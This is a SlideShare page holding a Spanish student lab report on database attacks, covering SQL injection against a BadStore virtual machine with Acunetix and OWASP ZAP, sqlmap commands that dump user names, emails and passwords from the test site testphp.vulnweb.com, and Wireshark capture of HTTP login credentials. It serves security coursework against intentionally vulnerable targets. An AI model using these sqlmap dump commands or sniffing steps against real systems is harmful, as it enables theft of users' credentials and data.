SlideShare una empresa de Scribd logo
1 de 39
ATAQUES A BASES DE 
DATOS 
Componente Práctico 1 
Arnulfo Fernando Hernández Daza 
Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD 
Tauramena, Colombia
1. ATAQUE POR INYECCION DE CODIGO 
SQL BASE DE DATOS BADSTORE 
 Lo primero que hacemos es instalar la base de datos en una máquina virtual; en 
este caso utilizamos VMware.
 Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed 
attack proxy. Instalamos y configuramos entonces OWASP Zed.
 Configuro en mi navegador el proxy para enlazar las busquedas del 
navegador con OWAS ZAP:
En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea 
del hostname establesco el mismo host que configure en el proxy del navegador: 
127.0.0.1
Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de 
Badstore.
Procedemos a la configuración de Acunetix: 
Aquí le indico a acunetix la dirección que quiero que escanee en busca de 
vulnerabilidades, es este caso será la dirección de Badstore, 
http://192.168.204.130/.
Y como se puede observar en la imagen siguiente, se comienza el escaneo de las 
vulnerabilidades de Badstore con acunetix:
Mientras se termina el escaneo podemos probar sobre un error hallado, el cross 
site scripting de la siguiente manera:
Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
Identificamos una amenaza para atacar:
Aplico un Fuzz a la direccion vulnerable del sitio:
Configuro el Fuzz:
Podemos observar la informacion de algunos clientes:
2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A 
SITIO WEB http://testphp.vulnweb.com/. 
Procedemos a instalar Python:
Copiamos la carpeta de sqlmap en el disco donde 
está instalado Python
Desde la ventana de símbolo de sistema accedemos a 
la carpeta que contiene los archivos sqlmap y 
ejecutamos el comando para obtener la información 
de la base de datos del sitio de BadStore: 
> color f4 
> cd sqlmap
Para obtener información de la base de datos 
buscamos primero una vulnerabilidad en la página 
digitando el código = al final de la dirección y 
observando el erros en la sintaxis de SQL.
Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código 
para obtener información: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza 
el sitio: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
Ahora buscaremos la información correspondiente a las tablas que muestra la 
base de datos: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart – 
tables
Ahora busquemos la informacion de las columnas de las tablas: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns
Ahora podemos averiguar los datos de alguna columna de la tabla users, con el 
siguiente codigo: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C name
Extraemos el contenido: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C name –dump
Averiguamos el correo: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C email –dump
Busquemos la contraseña: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C pass –dump
Ahora el usuario: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C uname –dump
Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y 
verificamos que los datos obtenidos son reales:
3. ATAQUE POR SNIFFING 
 Para el ataque por sniffing utilizaremos el software de Wireshark. 
 Descargamos e instalamos en nuestro equipo el software:
Una vez instalado el software de Wireshark procedemos a configurarlo y 
utilizarlo para nuestro análisis:
 Abrimos el menu Capture, damos clic en opciones y seleccionanos 
nuestra tarjeta de red y le damos iniciar escaneo de red:
 De esta forma se incia el escaneo del trafico en la red:
 Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo 
http; en este caso utilizaremos una cuenta de www.directoriow.com:
 Una vez logueados en el sitio con nuestros datos procedemos a usar 
Wireshark. Lo primero es dar clic en el botón Expression y escoger la 
opción HTTP – Hypertext transfer protocolo.
 Dentro del menú de opciones damos clic en http.request.method.
 Luego de esto buscamos la ip que destino que corresponde al sitio 
de www.directorio.com, que en este caso es 95.211.231.44.
 Una vez identificada la ip podermos filtrar todo el trafico 
correspondiente a este sitio con el comando ip.addr==95.211.231.44.
 Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del 
usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded 
podemos encontrar la información de usurario y contraseña que estamos buscando.
REFERENCIAS 
 Recuperado: 
 https://www.youtube.com/watch?v=-C9TEBIfyrg 
 
 Recuperado: 
 http://rootear.com/seguridad/utilizando-sqlma 
 
 Recuperado: 
 https://www.youtube.com/watch?v=OPhqJTBGZsw 
 
 Recuperado: 
 http://www.hacktimes.com/sql_injection_con_sqlmap/

Más contenido relacionado

La actualidad más candente

Web application security & Testing
Web application security  & TestingWeb application security  & Testing
Web application security & Testing
Deepu S Nath
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
virtualizacion de servidores completo
 virtualizacion de servidores completo virtualizacion de servidores completo
virtualizacion de servidores completo
Anderson Alcántara
 
Security testing presentation
Security testing presentationSecurity testing presentation
Security testing presentation
Confiz
 
5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx
5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx
5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx
Groe1
 

La actualidad más candente (20)

Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
Web application security & Testing
Web application security  & TestingWeb application security  & Testing
Web application security & Testing
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Fundamentos de la web
Fundamentos de la webFundamentos de la web
Fundamentos de la web
 
virtualizacion de servidores completo
 virtualizacion de servidores completo virtualizacion de servidores completo
virtualizacion de servidores completo
 
Launch and Environment Constraints Overview
Launch and Environment Constraints OverviewLaunch and Environment Constraints Overview
Launch and Environment Constraints Overview
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriPentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
 
Ssh brute force saldırıları
Ssh brute force saldırılarıSsh brute force saldırıları
Ssh brute force saldırıları
 
PowerPoint Seguridad Informática
PowerPoint Seguridad InformáticaPowerPoint Seguridad Informática
PowerPoint Seguridad Informática
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprise
 
Security testing presentation
Security testing presentationSecurity testing presentation
Security testing presentation
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Security testing fundamentals
Security testing fundamentalsSecurity testing fundamentals
Security testing fundamentals
 
Requirement for creating a Penetration Testing Lab
Requirement for creating a Penetration Testing LabRequirement for creating a Penetration Testing Lab
Requirement for creating a Penetration Testing Lab
 
OWASP ZAP
OWASP ZAPOWASP ZAP
OWASP ZAP
 
Pardus Kurulum Dokümanı
Pardus Kurulum DokümanıPardus Kurulum Dokümanı
Pardus Kurulum Dokümanı
 
5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx
5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx
5_1_2_Ejemplo_metodologia_ATAM_caso_mobike.pptx
 
Security testing
Security testingSecurity testing
Security testing
 

Destacado

Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtriséesRapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
pascaljan
 
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
tourtt
 
Court circuiter le monde
Court circuiter le mondeCourt circuiter le monde
Court circuiter le monde
ouicar
 
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Universidad Internacional Menendez Pelayo
 
Nador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsNador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personals
mllort2
 
Le luxe en periode de crise
Le luxe en periode de criseLe luxe en periode de crise
Le luxe en periode de crise
Victoire LO
 
Christmas show 2014
Christmas show 2014 Christmas show 2014
Christmas show 2014
jbbalan22
 
Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2
Yamid Murillo
 

Destacado (20)

Mesa Redonda: Smart Communities. Smart Cities
Mesa Redonda: Smart Communities. Smart CitiesMesa Redonda: Smart Communities. Smart Cities
Mesa Redonda: Smart Communities. Smart Cities
 
Juan Cristobal Martinez
Juan Cristobal MartinezJuan Cristobal Martinez
Juan Cristobal Martinez
 
FinanciacióN De La InnovacióN
FinanciacióN De La InnovacióNFinanciacióN De La InnovacióN
FinanciacióN De La InnovacióN
 
4.tic sante atelierh2020-frs consulting-10sept15
4.tic sante atelierh2020-frs consulting-10sept154.tic sante atelierh2020-frs consulting-10sept15
4.tic sante atelierh2020-frs consulting-10sept15
 
Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtriséesRapport LAMBERT - MALVY. Finances publiques locales maîtrisées
Rapport LAMBERT - MALVY. Finances publiques locales maîtrisées
 
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
L’agriculture familiale pour la sécurité alimentaire et nutritionnelle au sud...
 
Présentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsPrésentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraits
 
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
 
Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!!
 
Court circuiter le monde
Court circuiter le mondeCourt circuiter le monde
Court circuiter le monde
 
Google analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaGoogle analytics LAMKIRICH Asma
Google analytics LAMKIRICH Asma
 
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
 
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano GonzalezInstituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
 
Verre isolant
Verre isolantVerre isolant
Verre isolant
 
Nador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsNador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personals
 
CTE PRIMARIA PRIMERA SESION 2014
CTE PRIMARIA PRIMERA SESION 2014CTE PRIMARIA PRIMERA SESION 2014
CTE PRIMARIA PRIMERA SESION 2014
 
Le luxe en periode de crise
Le luxe en periode de criseLe luxe en periode de crise
Le luxe en periode de crise
 
Christmas show 2014
Christmas show 2014 Christmas show 2014
Christmas show 2014
 
Triangle
TriangleTriangle
Triangle
 
Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2
 

Similar a Ataques a bases de datos

Manual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxyManual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxy
SALVADORCHANHERNANDEZ
 

Similar a Ataques a bases de datos (20)

Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Team.docx
Team.docxTeam.docx
Team.docx
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql web
 
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Present3
Present3Present3
Present3
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATION
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
Labs
LabsLabs
Labs
 
Taller
TallerTaller
Taller
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Manual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxyManual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxy
 

Último

CLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptxCLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptx
bingoscarlet
 
NTP- Determinación de Cloruros en suelos y agregados (1) (1).pptx
NTP- Determinación de Cloruros  en suelos y agregados (1) (1).pptxNTP- Determinación de Cloruros  en suelos y agregados (1) (1).pptx
NTP- Determinación de Cloruros en suelos y agregados (1) (1).pptx
BRAYANJOSEPTSANJINEZ
 
INSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNAT
INSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNATINSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNAT
INSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNAT
evercoyla
 
LA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdf
LA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdfLA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdf
LA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdf
bcondort
 

Último (20)

CLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptxCLASe número 4 fotogrametria Y PARALAJE.pptx
CLASe número 4 fotogrametria Y PARALAJE.pptx
 
Resistencia-a-los-antimicrobianos--laboratorio-al-cuidado-del-paciente_Marcel...
Resistencia-a-los-antimicrobianos--laboratorio-al-cuidado-del-paciente_Marcel...Resistencia-a-los-antimicrobianos--laboratorio-al-cuidado-del-paciente_Marcel...
Resistencia-a-los-antimicrobianos--laboratorio-al-cuidado-del-paciente_Marcel...
 
libro de ingeniería de petróleos y operaciones
libro de ingeniería de petróleos y operacioneslibro de ingeniería de petróleos y operaciones
libro de ingeniería de petróleos y operaciones
 
Principales aportes de la carrera de William Edwards Deming
Principales aportes de la carrera de William Edwards DemingPrincipales aportes de la carrera de William Edwards Deming
Principales aportes de la carrera de William Edwards Deming
 
CALCULO SISTEMA DE PUESTA A TIERRA PARA BAJA TENSION Y MEDIA TENSION
CALCULO SISTEMA DE PUESTA A TIERRA PARA BAJA TENSION Y MEDIA TENSIONCALCULO SISTEMA DE PUESTA A TIERRA PARA BAJA TENSION Y MEDIA TENSION
CALCULO SISTEMA DE PUESTA A TIERRA PARA BAJA TENSION Y MEDIA TENSION
 
Controladores Lógicos Programables Usos y Ventajas
Controladores Lógicos Programables Usos y VentajasControladores Lógicos Programables Usos y Ventajas
Controladores Lógicos Programables Usos y Ventajas
 
01 MATERIALES AERONAUTICOS VARIOS clase 1.ppt
01 MATERIALES AERONAUTICOS VARIOS clase 1.ppt01 MATERIALES AERONAUTICOS VARIOS clase 1.ppt
01 MATERIALES AERONAUTICOS VARIOS clase 1.ppt
 
TIPOS DE SOPORTES - CLASIFICACION IG.pdf
TIPOS DE SOPORTES - CLASIFICACION IG.pdfTIPOS DE SOPORTES - CLASIFICACION IG.pdf
TIPOS DE SOPORTES - CLASIFICACION IG.pdf
 
Herramientas de la productividad - Revit
Herramientas de la productividad - RevitHerramientas de la productividad - Revit
Herramientas de la productividad - Revit
 
Aportes a la Arquitectura de Le Corbusier y Mies Van der Rohe
Aportes a la Arquitectura de Le Corbusier y Mies Van der RoheAportes a la Arquitectura de Le Corbusier y Mies Van der Rohe
Aportes a la Arquitectura de Le Corbusier y Mies Van der Rohe
 
Quimica Raymond Chang 12va Edicion___pdf
Quimica Raymond Chang 12va Edicion___pdfQuimica Raymond Chang 12va Edicion___pdf
Quimica Raymond Chang 12va Edicion___pdf
 
Maquinaria Agricola utilizada en la produccion de Piña.pdf
Maquinaria Agricola utilizada en la produccion de Piña.pdfMaquinaria Agricola utilizada en la produccion de Piña.pdf
Maquinaria Agricola utilizada en la produccion de Piña.pdf
 
NTP- Determinación de Cloruros en suelos y agregados (1) (1).pptx
NTP- Determinación de Cloruros  en suelos y agregados (1) (1).pptxNTP- Determinación de Cloruros  en suelos y agregados (1) (1).pptx
NTP- Determinación de Cloruros en suelos y agregados (1) (1).pptx
 
Gestion de proyectos para el control y seguimiento
Gestion de proyectos para el control  y seguimientoGestion de proyectos para el control  y seguimiento
Gestion de proyectos para el control y seguimiento
 
Desigualdades e inecuaciones-convertido.pdf
Desigualdades e inecuaciones-convertido.pdfDesigualdades e inecuaciones-convertido.pdf
Desigualdades e inecuaciones-convertido.pdf
 
Ejemplos de cadenas de Markov - Ejercicios
Ejemplos de cadenas de Markov - EjerciciosEjemplos de cadenas de Markov - Ejercicios
Ejemplos de cadenas de Markov - Ejercicios
 
DIAPOSITIVAS DE SEGURIDAD Y SALUD EN EL TRABAJO
DIAPOSITIVAS DE SEGURIDAD Y SALUD EN EL TRABAJODIAPOSITIVAS DE SEGURIDAD Y SALUD EN EL TRABAJO
DIAPOSITIVAS DE SEGURIDAD Y SALUD EN EL TRABAJO
 
INSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNAT
INSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNATINSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNAT
INSUMOS QUIMICOS Y BIENES FISCALIZADOS POR LA SUNAT
 
LA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdf
LA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdfLA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdf
LA APLICACIÓN DE LAS PROPIEDADES TEXTUALES A LOS TEXTOS.pdf
 
2. Cristaloquimica. ingenieria geologica
2. Cristaloquimica. ingenieria geologica2. Cristaloquimica. ingenieria geologica
2. Cristaloquimica. ingenieria geologica
 

Ataques a bases de datos

  • 1. ATAQUES A BASES DE DATOS Componente Práctico 1 Arnulfo Fernando Hernández Daza Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD Tauramena, Colombia
  • 2. 1. ATAQUE POR INYECCION DE CODIGO SQL BASE DE DATOS BADSTORE  Lo primero que hacemos es instalar la base de datos en una máquina virtual; en este caso utilizamos VMware.
  • 3.  Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed attack proxy. Instalamos y configuramos entonces OWASP Zed.
  • 4.  Configuro en mi navegador el proxy para enlazar las busquedas del navegador con OWAS ZAP:
  • 5. En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea del hostname establesco el mismo host que configure en el proxy del navegador: 127.0.0.1
  • 6. Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de Badstore.
  • 7. Procedemos a la configuración de Acunetix: Aquí le indico a acunetix la dirección que quiero que escanee en busca de vulnerabilidades, es este caso será la dirección de Badstore, http://192.168.204.130/.
  • 8. Y como se puede observar en la imagen siguiente, se comienza el escaneo de las vulnerabilidades de Badstore con acunetix:
  • 9. Mientras se termina el escaneo podemos probar sobre un error hallado, el cross site scripting de la siguiente manera:
  • 10. Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
  • 12. Aplico un Fuzz a la direccion vulnerable del sitio:
  • 14. Podemos observar la informacion de algunos clientes:
  • 15. 2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB http://testphp.vulnweb.com/. Procedemos a instalar Python:
  • 16. Copiamos la carpeta de sqlmap en el disco donde está instalado Python
  • 17. Desde la ventana de símbolo de sistema accedemos a la carpeta que contiene los archivos sqlmap y ejecutamos el comando para obtener la información de la base de datos del sitio de BadStore: > color f4 > cd sqlmap
  • 18. Para obtener información de la base de datos buscamos primero una vulnerabilidad en la página digitando el código = al final de la dirección y observando el erros en la sintaxis de SQL.
  • 19. Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código para obtener información: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
  • 20. Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza el sitio: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
  • 21. Ahora buscaremos la información correspondiente a las tablas que muestra la base de datos: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart – tables
  • 22. Ahora busquemos la informacion de las columnas de las tablas: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns
  • 23. Ahora podemos averiguar los datos de alguna columna de la tabla users, con el siguiente codigo: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C name
  • 24. Extraemos el contenido: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C name –dump
  • 25. Averiguamos el correo: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C email –dump
  • 26. Busquemos la contraseña: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C pass –dump
  • 27. Ahora el usuario: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C uname –dump
  • 28. Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y verificamos que los datos obtenidos son reales:
  • 29. 3. ATAQUE POR SNIFFING  Para el ataque por sniffing utilizaremos el software de Wireshark.  Descargamos e instalamos en nuestro equipo el software:
  • 30. Una vez instalado el software de Wireshark procedemos a configurarlo y utilizarlo para nuestro análisis:
  • 31.  Abrimos el menu Capture, damos clic en opciones y seleccionanos nuestra tarjeta de red y le damos iniciar escaneo de red:
  • 32.  De esta forma se incia el escaneo del trafico en la red:
  • 33.  Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo http; en este caso utilizaremos una cuenta de www.directoriow.com:
  • 34.  Una vez logueados en el sitio con nuestros datos procedemos a usar Wireshark. Lo primero es dar clic en el botón Expression y escoger la opción HTTP – Hypertext transfer protocolo.
  • 35.  Dentro del menú de opciones damos clic en http.request.method.
  • 36.  Luego de esto buscamos la ip que destino que corresponde al sitio de www.directorio.com, que en este caso es 95.211.231.44.
  • 37.  Una vez identificada la ip podermos filtrar todo el trafico correspondiente a este sitio con el comando ip.addr==95.211.231.44.
  • 38.  Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded podemos encontrar la información de usurario y contraseña que estamos buscando.
  • 39. REFERENCIAS  Recuperado:  https://www.youtube.com/watch?v=-C9TEBIfyrg   Recuperado:  http://rootear.com/seguridad/utilizando-sqlma   Recuperado:  https://www.youtube.com/watch?v=OPhqJTBGZsw   Recuperado:  http://www.hacktimes.com/sql_injection_con_sqlmap/